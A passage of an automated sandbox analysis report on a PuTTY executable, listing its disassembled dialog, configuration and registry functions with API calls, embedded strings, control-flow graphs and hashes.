                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ItemMessageSend_set_error_mode
                      • String ID: !dp->shortcuts[s]$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$0$COMBOBOX$LISTBOX$STATIC$ret == c$ud
                      • API String ID: 3184551911-1172212562
                      • Opcode ID: 9f20c77925bbc0044631ccf326b4f83694382a9a88885be6bc3de373428def9f
                      • Instruction ID: 01a6f40fd78a86455962911c5b73b8f5e19c6faa312addbf40ab0c481e533b41
                      • Opcode Fuzzy Hash: 9f20c77925bbc0044631ccf326b4f83694382a9a88885be6bc3de373428def9f
                      • Instruction Fuzzy Hash: 54D1D173A182828AE774CF25E444BABBBA5F784784F144239DA5987B89DF3CD904CF04
                      Function 00007FF6785F50B0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 27libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: DrawInsert$InitCommonControls$LBItemFromPt$MakeDragList$comctl32.dll
                      • API String ID: 2238633743-1292723818
                      • Opcode ID: 94718e5887e2b781b78c5227e31c79f2b51bffc4c732e88a8550ad2025163722
                      • Instruction ID: d552d1d2b00c79e197f4cc7a5a50f37c29c7f2ca3c75107c88d2da8571b6c43e
                      • Opcode Fuzzy Hash: 94718e5887e2b781b78c5227e31c79f2b51bffc4c732e88a8550ad2025163722
                      • Instruction Fuzzy Hash: 17F0446AA29A06A0E901AB25FD540A62B55AF147C1F719132C90CC2724DE3CE947A758
                      Function 00007FF678624BC0 Relevance: 13.6, APIs: 9, Instructions: 94windowregistryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Message$DialogWindow$ClassCreateCursorDestroyDispatchLoadLongParamPostQuitRegister
                      • String ID:
                      • API String ID: 4008243408-0
                      • Opcode ID: 8dc0eb86304c87fce5710041ab16b5df4aff4e4aec2429a9720ab6fd90c5c869
                      • Instruction ID: 01650e4c50b8c4cf4f918d4c061ae1880b28003d0181677972f61aca2c0d8534
                      • Opcode Fuzzy Hash: 8dc0eb86304c87fce5710041ab16b5df4aff4e4aec2429a9720ab6fd90c5c869
                      • Instruction Fuzzy Hash: 93418022A18BC195E760CB25F8043AB7BA0FB99790F604174DE8D87768DF3CD949DB04
                      Function 00007FF6785F728F Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 269windowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 3325 7ff6785f728f-7ff6785f72d7 call 7ff6785f8560 3328 7ff6785f72d9-7ff6785f72e4 3325->3328 3329 7ff6785f72f7-7ff6785f7373 call 7ff6785f51e0 call 7ff678613590 3325->3329 3328->3329 3330 7ff6785f72e6-7ff6785f72f1 SendMessageA 3328->3330 3335 7ff6785f7fc1-7ff6785f7fff call 7ff6786134f0 3329->3335 3336 7ff6785f7379-7ff6785f7388 call 7ff678613590 3329->3336 3330->3329 3342 7ff6785f8001-7ff6785f8014 call 7ff678614b00 3335->3342 3343 7ff6785f802f-7ff6785f8043 call 7ff678614b00 3335->3343 3345 7ff6785f81b0-7ff6785f81b8 3336->3345 3342->3343 3350 7ff6785f8016-7ff6785f802a call 7ff67869b8ac 3342->3350 3353 7ff6785f8045-7ff6785f8059 call 7ff67869b8ac 3343->3353 3354 7ff6785f805e-7ff6785f8060 3343->3354 3348 7ff6785f81ce-7ff6785f81ef 3345->3348 3351 7ff6785f81f5-7ff6785f81f7 3348->3351 3352 7ff6785f6900-7ff6785f690d 3348->3352 3350->3343 3351->3352 3356 7ff6785f81fd-7ff6785f821b 3351->3356 3359 7ff6785f6913-7ff6785f6927 3352->3359 3360 7ff6785f83b8-7ff6785f83cc 3352->3360 3353->3354 3358 7ff6785f8087-7ff6785f808f 3354->3358 3363 7ff6785f8220-7ff6785f822d 3356->3363 3364 7ff6785f8091-7ff6785f80a6 call 7ff6786a11ac 3358->3364 3365 7ff6785f807d-7ff6785f8085 3358->3365 3361 7ff6785f6b90-7ff6785f6b96 3359->3361 3362 7ff6785f692d-7ff6785f6930 3359->3362 3366 7ff6785f83d5-7ff6785f83e1 3360->3366 3367 7ff6785f83ce 3360->3367 3371 7ff6785f6bb1-7ff6785f6bc5 3361->3371 3372 7ff6785f6b98-7ff6785f6bac call 7ff67869b8ac 3361->3372 3368 7ff6785f6c00-7ff6785f6cb2 3362->3368 3369 7ff6785f6936-7ff6785f6949 3362->3369 3363->3363 3370 7ff6785f822f 3363->3370 3403 7ff6785f8070-7ff6785f8078 3364->3403 3404 7ff6785f80a8-7ff6785f80c1 call 7ff67869b8ac 3364->3404 3365->3358 3373 7ff6785f80d0-7ff6785f80e4 3365->3373 3376 7ff6785f84dd-7ff6785f84ec 3366->3376 3377 7ff6785f83e7 3366->3377 3375 7ff6785f8409-7ff6785f8418 3367->3375 3379 7ff6785f6ccd-7ff6785f6cd1 3368->3379 3380 7ff6785f6964-7ff6785f6969 3369->3380 3381 7ff6785f694b-7ff6785f695f call 7ff67869b8ac 3369->3381 3370->3352 3386 7ff6785f6bcb-7ff6785f6bd6 3371->3386 3387 7ff6785f6ec6 3371->3387 3372->3371 3373->3345 3382 7ff6785f80ea-7ff6785f8102 3373->3382 3383 7ff6785f84b1-7ff6785f84dc call 7ff67868a9f0 3375->3383 3384 7ff6785f841e-7ff6785f8421 3375->3384 3388 7ff6785f8501-7ff6785f8506 3376->3388 3378 7ff6785f83e9-7ff6785f83f0 3377->3378 3378->3375 3390 7ff6785f83f2-7ff6785f8403 3378->3390 3392 7ff6785f6cd3-7ff6785f6cdc 3379->3392 3393 7ff6785f6cc0-7ff6785f6ccb 3379->3393 3396 7ff6785f696f-7ff6785f697b 3380->3396 3397 7ff6785f6d6a-7ff6785f6d74 3380->3397 3381->3380 3395 7ff6785f811d-7ff6785f8135 call 7ff6786157e0 3382->3395 3384->3383 3398 7ff6785f8427-7ff6785f84a7 call 7ff6785f51e0 3384->3398 3400 7ff6785f6be0-7ff6785f6be8 3386->3400 3391 7ff6785f6ec8-7ff6785f6ee1 call 7ff67869b8ac 3387->3391 3401 7ff6785f850e-7ff6785f8512 3388->3401 3402 7ff6785f8508-7ff6785f850c 3388->3402 3390->3375 3412 7ff6785f8405 3390->3412 3410 7ff6785f6ee4-7ff6785f6f43 3391->3410 3392->3393 3393->3379 3413 7ff6785f6ce0-7ff6785f6ce6 3393->3413 3438 7ff6785f8150-7ff6785f8167 GetDlgItem 3395->3438 3439 7ff6785f8137-7ff6785f814b call 7ff67869b8ac 3395->3439 3414 7ff6785f697d-7ff6785f6991 call 7ff67869b8ac 3396->3414 3415 7ff6785f6996-7ff6785f6999 3396->3415 3417 7ff6785f68b4 3397->3417 3418 7ff6785f6d7a-7ff6785f6d90 3397->3418 3429 7ff6785f84ac 3398->3429 3400->3410 3411 7ff6785f6bee-7ff6785f6bf5 3400->3411 3405 7ff6785f8514-7ff6785f851a 3401->3405 3406 7ff6785f84f0-7ff6785f84fb 3401->3406 3402->3401 3403->3365 3404->3403 3405->3406 3406->3378 3406->3388 3423 7ff6785f6f50-7ff6785f6f60 3410->3423 3411->3400 3425 7ff6785f6bf7 3411->3425 3412->3375 3426 7ff6785f6f45-7ff6785f6f48 3413->3426 3427 7ff6785f6cec-7ff6785f6cf2 3413->3427 3414->3415 3430 7ff6785f6af5-7ff6785f6af7 3415->3430 3431 7ff6785f699f-7ff6785f69bb 3415->3431 3421 7ff6785f68b9-7ff6785f68f7 3417->3421 3432 7ff6785f6e9a-7ff6785f6ead 3418->3432 3433 7ff6785f6d96-7ff6785f6db9 3418->3433 3421->3352 3436 7ff6785f851c-7ff6785f853b call 7ff67869b8ac call 7ff6785d7a30 3423->3436 3437 7ff6785f6f66-7ff6785f6f74 3423->3437 3425->3391 3426->3423 3440 7ff6785f6cf4-7ff6785f6d08 call 7ff67869b8ac 3427->3440 3441 7ff6785f6d0d-7ff6785f6d65 3427->3441 3429->3383 3434 7ff6785f7613-7ff6785f761b 3430->3434 3435 7ff6785f6afd-7ff6785f6b1e 3430->3435 3442 7ff6785f69c1-7ff6785f69df 3431->3442 3443 7ff6785f6a96-7ff6785f6a9c 3431->3443 3445 7ff6785f6eb0-7ff6785f6ebf 3432->3445 3444 7ff6785f6dc0-7ff6785f6e41 3433->3444 3434->3352 3447 7ff6785f6b20-7ff6785f6b7d 3435->3447 3437->3434 3450 7ff6785f8182-7ff6785f818d 3438->3450 3451 7ff6785f8169-7ff6785f817d call 7ff67869b8ac 3438->3451 3439->3438 3440->3441 3441->3423 3453 7ff6785f69e0-7ff6785f6a90 3442->3453 3443->3430 3454 7ff6785f6a9e-7ff6785f6aba 3443->3454 3444->3444 3455 7ff6785f6e47-7ff6785f6e94 3444->3455 3445->3445 3446 7ff6785f6ec1 3445->3446 3446->3421 3447->3447 3456 7ff6785f6b7f-7ff6785f6b87 3447->3456 3463 7ff6785f8110-7ff6785f8117 3450->3463 3464 7ff6785f818f-7ff6785f81a4 3450->3464 3451->3450 3453->3443 3453->3453 3459 7ff6785f6ac0-7ff6785f6af3 3454->3459 3455->3421 3455->3432 3456->3352 3459->3430 3459->3459 3463->3395 3465 7ff6785f81c0-7ff6785f81c3 3463->3465 3464->3463 3466 7ff6785f825b-7ff6785f8273 call 7ff6786157e0 3465->3466 3467 7ff6785f81c9 3465->3467 3470 7ff6785f8275-7ff6785f8289 call 7ff67869b8ac 3466->3470 3471 7ff6785f828e-7ff6785f82a5 GetDlgItem 3466->3471 3467->3348 3470->3471 3472 7ff6785f82c0-7ff6785f82d0 3471->3472 3473 7ff6785f82a7-7ff6785f82bb call 7ff67869b8ac 3471->3473 3477 7ff6785f8240-7ff6785f8255 3472->3477 3478 7ff6785f82d6-7ff6785f82db 3472->3478 3473->3472 3477->3466 3477->3467 3478->3477 3479 7ff6785f82e1-7ff6785f82fa 3478->3479 3479->3477 3480 7ff6785f8300-7ff6785f8318 3479->3480 3481 7ff6785f832c-7ff6785f834a GetDlgItem 3480->3481 3483 7ff6785f8320-7ff6785f8326 3481->3483 3484 7ff6785f834c-7ff6785f837e ScreenToClient 3481->3484 3483->3477 3483->3481 3484->3483 3485 7ff6785f8380-7ff6785f83b3 SetWindowPos 3484->3485 3485->3483
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: !dp->shortcuts[s]$(ctrl->columns.ncols == 1) ^ (ncols == 1)$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$BUTTON$ncols <= lenof(columns)$ret == c
                      • API String ID: 3850602802-881213205
                      • Opcode ID: 15038341bca84f7f5042ea09811a7eff4d436e285bc1cfc11302dc7fc67c737a
                      • Instruction ID: 820e25b10a8c4faac66f18376f37207ec05cd4cf80e9820740bdd12db06e94c4
                      • Opcode Fuzzy Hash: 15038341bca84f7f5042ea09811a7eff4d436e285bc1cfc11302dc7fc67c737a
                      • Instruction Fuzzy Hash: 58D1D063A186C185FB618B29A4453FABBA1FF94784F144235DE8D83794EF7CE944CB08
                      Function 00007FF67860C930 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 399COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 3520 7ff67860c930-7ff67860c941 3521 7ff67860c97e-7ff67860c9a4 call 7ff678613590 * 2 3520->3521 3522 7ff67860c943-7ff67860c952 call 7ff678613bc0 3520->3522 3527 7ff67860c954-7ff67860c979 call 7ff678612eb0 * 2 3522->3527 3528 7ff67860c9a5 call 7ff67860d0a0 3522->3528 3541 7ff67860c9ff-7ff67860ca1f call 7ff678613d00 3527->3541 3534 7ff67860c9aa-7ff67860c9ad 3528->3534 3536 7ff67860c9af-7ff67860c9bf call 7ff67860d100 3534->3536 3537 7ff67860c9f1-7ff67860c9fa call 7ff678612ba0 3534->3537 3543 7ff67860c9e9-7ff67860c9ec call 7ff67860cc40 3536->3543 3544 7ff67860c9c1-7ff67860c9cf 3536->3544 3537->3541 3550 7ff67860ca5e-7ff67860ca86 call 7ff6786134f0 3541->3550 3551 7ff67860ca21-7ff67860ca29 3541->3551 3543->3537 3546 7ff67860c9d0-7ff67860c9e7 call 7ff678612ba0 call 7ff67860d100 3544->3546 3546->3543 3560 7ff67860ca88-7ff67860ca9e 3550->3560 3561 7ff67860cace-7ff67869f3cb 3550->3561 3554 7ff67860ca30-7ff67860ca3d call 7ff67869fc60 3551->3554 3562 7ff67860ca3f-7ff67860ca4f 3554->3562 3563 7ff67860ca50-7ff67860ca57 3554->3563 3564 7ff67860caa0-7ff67860caad call 7ff67869fc60 3560->3564 3566 7ff67869f3e7-7ff67869f3ea 3561->3566 3567 7ff67869f3cd-7ff67869f3d0 3561->3567 3562->3563 3563->3563 3568 7ff67860ca59-7ff67860ca5c 3563->3568 3575 7ff67860caaf-7ff67860cabd 3564->3575 3576 7ff67860cac0-7ff67860cac7 3564->3576 3570 7ff67869f3d2-7ff67869f3e2 call 7ff67869a688 call 7ff6786a45fc 3566->3570 3571 7ff67869f3ec-7ff67869f3ef 3566->3571 3567->3566 3567->3570 3568->3550 3568->3554 3578 7ff67869f790-7ff67869f7ad call 7ff67868a9f0 3570->3578 3571->3570 3574 7ff67869f3f1-7ff67869f3f5 3571->3574 3574->3578 3579 7ff67869f3fb-7ff67869f435 3574->3579 3575->3576 3576->3576 3580 7ff67860cac9-7ff67860cacc 3576->3580 3583 7ff67869f440-7ff67869f453 3579->3583 3580->3561 3580->3564 3586 7ff67869f4f4-7ff67869f51a 3583->3586 3587 7ff67869f459-7ff67869f45c 3583->3587 3594 7ff67869f54b-7ff67869f566 3586->3594 3595 7ff67869f51c-7ff67869f525 3586->3595 3588 7ff67869f45e 3587->3588 3589 7ff67869f4d3-7ff67869f4dc 3587->3589 3593 7ff67869f462-7ff67869f46b 3588->3593 3590 7ff67869f4e2-7ff67869f4ef 3589->3590 3591 7ff67869f768-7ff67869f788 3589->3591 3590->3583 3591->3578 3596 7ff67869f497-7ff67869f4a0 3593->3596 3597 7ff67869f46d 3593->3597 3607 7ff67869f598-7ff67869f5b3 3594->3607 3608 7ff67869f568-7ff67869f571 3594->3608 3595->3594 3600 7ff67869f527 3595->3600 3598 7ff67869f4a2-7ff67869f4a5 3596->3598 3599 7ff67869f4c6-7ff67869f4cc 3596->3599 3601 7ff67869f470-7ff67869f495 3597->3601 3603 7ff67869f4b0-7ff67869f4c4 3598->3603 3599->3593 3604 7ff67869f4ce 3599->3604 3605 7ff67869f530-7ff67869f549 3600->3605 3601->3596 3603->3599 3603->3603 3604->3589 3605->3594 3605->3605 3612 7ff67869f5b5-7ff67869f5be 3607->3612 3613 7ff67869f5e8-7ff67869f5ee 3607->3613 3608->3607 3609 7ff67869f573-7ff67869f579 3608->3609 3610 7ff67869f580-7ff67869f596 3609->3610 3610->3607 3610->3610 3612->3613 3614 7ff67869f5c0-7ff67869f5c6 3612->3614 3615 7ff67869f5f0-7ff67869f5f3 3613->3615 3616 7ff67869f5d0-7ff67869f5e6 3614->3616 3617 7ff67869f620-7ff67869f626 3615->3617 3618 7ff67869f5f5-7ff67869f5fb 3615->3618 3616->3613 3616->3616 3619 7ff67869f645-7ff67869f64e 3617->3619 3620 7ff67869f628-7ff67869f643 3617->3620 3618->3617 3621 7ff67869f5fd-7ff67869f618 3618->3621 3622 7ff67869f650-7ff67869f66b 3619->3622 3623 7ff67869f66d-7ff67869f670 3619->3623 3620->3617 3620->3619 3621->3618 3630 7ff67869f61a 3621->3630 3622->3619 3622->3623 3626 7ff67869f672-7ff67869f678 3623->3626 3627 7ff67869f6aa-7ff67869f6ad 3623->3627 3632 7ff67869f698-7ff67869f6a5 3626->3632 3633 7ff67869f67a-7ff67869f67d 3626->3633 3628 7ff67869f6af 3627->3628 3629 7ff67869f6d7-7ff67869f6dd 3627->3629 3634 7ff67869f6b0-7ff67869f6b6 3628->3634 3635 7ff67869f6df-7ff67869f6fa 3629->3635 3636 7ff67869f6fc-7ff67869f710 3629->3636 3630->3619 3632->3615 3637 7ff67869f680-7ff67869f696 3633->3637 3634->3629 3638 7ff67869f6b8-7ff67869f6d3 3634->3638 3635->3629 3635->3636 3639 7ff67869f712-7ff67869f715 3636->3639 3640 7ff67869f73d-7ff67869f740 3636->3640 3637->3632 3637->3637 3638->3634 3649 7ff67869f6d5 3638->3649 3644 7ff67869f717-7ff67869f727 3639->3644 3645 7ff67869f72c-7ff67869f72f 3639->3645 3641 7ff67869f742-7ff67869f752 3640->3641 3642 7ff67869f757-7ff67869f75a 3640->3642 3641->3642 3642->3589 3646 7ff67869f760-7ff67869f763 3642->3646 3644->3645 3645->3589 3648 7ff67869f735-7ff67869f738 3645->3648 3646->3583 3648->3583 3649->3636
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/config.c$Default Settings$demo-server$demo-server-2
                      • API String ID: 0-294979178
                      • Opcode ID: 589f9e8e79dd31173eb59e23a9f425e712c61965e9abdc51a7d0c42d5eb83586
                      • Instruction ID: ec33dfaf0a811189f4c0a9ef8b9b1977237fc462de4cf3ab0485bd3b9e95aeeb
                      • Opcode Fuzzy Hash: 589f9e8e79dd31173eb59e23a9f425e712c61965e9abdc51a7d0c42d5eb83586
                      • Instruction Fuzzy Hash: 30E11763B3968261EA109F32E9047BB6F91AB45FC0F694435CE4D977D6DE3CE844A308
                      Function 00007FF6785F51E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69windowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Window$CreateDialogMessageRectSend
                      • String ID: LISTBOX
                      • API String ID: 4261271132-1812161947
                      • Opcode ID: 4675824aa6d38a0693fc2184b3d9715887497bee4671b815ee1fa70ff92b6202
                      • Instruction ID: cbcda1e7e940ae546faa23a5a253dc3a61963b2becdcf0e87239caa86435bc28
                      • Opcode Fuzzy Hash: 4675824aa6d38a0693fc2184b3d9715887497bee4671b815ee1fa70ff92b6202
                      • Instruction Fuzzy Hash: 9F218F7361868187E7648F16F840A5ABBA0F758BA4F248135EF8D83B54DF3CE940CB04
                      Function 00007FF6785F9C10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6785F9C72
                      • c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00007FF6785F9C6B
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                      • API String ID: 3015471070-2883471717
                      • Opcode ID: c90d57f835871b3c7a2068380126451181b6ba045c18c22e5594f4d080dd311e
                      • Instruction ID: a0d7632cba9d6683b3dddaa6a00c800399a3994944aae1a606582bad0a4c0506
                      • Opcode Fuzzy Hash: c90d57f835871b3c7a2068380126451181b6ba045c18c22e5594f4d080dd311e
                      • Instruction Fuzzy Hash: CC219133B28A4596FB618B26E8807B97F90BB94B84F644035CE0D87791DE3DD841DB08
                      Function 00007FF6785FB080 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • SetCurrentProcessExplicitAppUserModelID.SHELL32(?,?,?,?,00007FF6785D51CB), ref: 00007FF6785FB0A2
                      • GetProcAddress.KERNEL32(?,?,?,?,00007FF6785D51CB), ref: 00007FF6785FB0D1
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AddressCurrentExplicitModelProcProcessUser
                      • String ID: SetCurrentProcessExplicitAppUserModelID$Shell32.dll
                      • API String ID: 3773935857-666802935
                      • Opcode ID: 0f7a0512b40ab475cb57f40d5e68047ef61245add5cc39f49632a0cdccdf3a37
                      • Instruction ID: 5463b9bd19fffa403fee2cfab67b40269213c0786c1d362e16755980acbac4e5
                      • Opcode Fuzzy Hash: 0f7a0512b40ab475cb57f40d5e68047ef61245add5cc39f49632a0cdccdf3a37
                      • Instruction Fuzzy Hash: BFF04F16E3A703A0FD95AB3598683322A986F24780F700434C40DC23A0EE3CFC45BA19
                      Function 00007FF678616460 Relevance: 6.1, APIs: 4, Instructions: 84registryCOMMON
                      Download Yara Rule
                      APIs
                      • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF67861652D
                      • RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF678616551
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF678616565
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF678616576
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
